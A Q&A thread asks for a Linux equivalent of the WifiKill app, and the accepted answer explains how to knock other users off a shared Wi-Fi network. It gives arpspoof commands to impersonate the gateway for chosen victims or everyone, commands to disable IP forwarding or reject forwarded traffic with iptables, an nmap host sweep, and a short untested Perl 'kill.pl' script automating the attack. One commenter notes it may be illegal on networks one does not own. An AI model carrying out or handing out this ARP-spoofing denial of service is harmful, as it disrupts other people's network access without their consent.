# A PC application similar to Wifikill in Android

Tags: linux, networking, wireless-networking, android

Is there any (preferably Linux) program similar to the WifiKill Android app?

Comment: For those of us who don't have an Android phone — what does it do?

Comment: If you are connected to a wiFi Network, you can use this app to "cut" some people from the network (They will still be connected to the AP but all their packets will be dropped)

Comment: more details and more research effort please

Comment: It should be noted that doing this on an access point you do not own could be considered against the Terms of Service and maybe even illegal (I'm not sure about the legality, and IANAL).

Answer (score 4, accepted):

Well, Android is Linux therefore you can replicate the actions of ponury's `WifiKill` on your Linux computer

`WifiKill` does two things:

1. It masqurerades as the gateway, so the victims would send packets to the phone instead of sendng them to the gateway
2. It turns off packet forwarding. Therefore, the victims will send all packets to your computer which will drop them

For masquerading you need ARP spoofing. You can use the `arpspoof` command from [dsniff](http://monkey.org/~dugsong/dsniff/):

1. First, you must know the IP of the gateway. Run `route -n` in a terminal and get the gateway's IP from there. In the most common case (you are only connected to the wireless network), the gateway would be the entry with Destination `0.0.0.0`. You can use `route -n|grep ^0.0.0.0|cut -d' ' -f 10` to get the IP of the default gateway
2. Then, use `arpspoof` to masquerade as the gateway. Run `arpspoof $IP` as root if you want to kill the whole network except for you, or run `arpspoof -t $VICTIM_IP $IP` for each victim if you want to kill only certain hosts

Now you are masquerading as the network's gateway. All packets sent by the victims are sent to your computer. You now have to turn off packet forwarding. To do this run `echo -n 0 > /proc/sys/net/ipv?/ip_forward` as root. This will drop all packets sent by the victims

It's been a long time since I last used `WifiKill`, but I remember it had a option to reject packets instead of dropping them [ rejecting gives people an instant connection error, dropping lets all their connections time out ]. To do this, you have to:

1. *Enable* packet forwarding by running `echo -n 1 > /proc/sys/net/ipv?/ip_forward` as root
2. Set `netfilter`'s default FORWARD policy to REJECT. Run `iptables -P FORWARD REJECT`. Of course, you can use `iptables` for arbitrarily complex firewalling rules

`WifiKill` also lists the online hosts. To do this in Linux, you can use `nmap` to ping hosts in a given range. For example, if you want to find out what hosts are online in the range `192.168.1.1` to `192.168.1.254` you can run `nmap -sP 192.168.1.1-254`. While this will not list computers with 'stealth' firewalls, you can still kill these computers if you kill everybody on the network or if you know their exact IP

There might be a program out there doing what I listed above, but for the common case you can write a script:

```
#!/usr/bin/perl -w
#This is untested code. Compiling works, but I haven't tested anything more
my $gw=`route -n|grep ^0.0.0.0|cut -d' ' -f 10`;
if (@ARGV) {
  print "arpspoof -t $_ $gw &" for (@ARGV);
} else {
  print "arpspoof $gw &";
}
system "echo 0 > $_" for(</proc/sys/net/ipv?/ip_forward>);
```

Save this as `kill.pl` then call it as `./kill.pl $IP1 $IP2 ... $IPn` to kill `$IP1`, `$IP2`, ..., `$IPn` or as `./kill.pl` to kill all hosts

Comment: I've made a script in bash, based on this answer: https://gist.github.com/FedericoPonzi/0d2210164b573b283cea

Answer (score 0):

Netcut for Windows does similar task.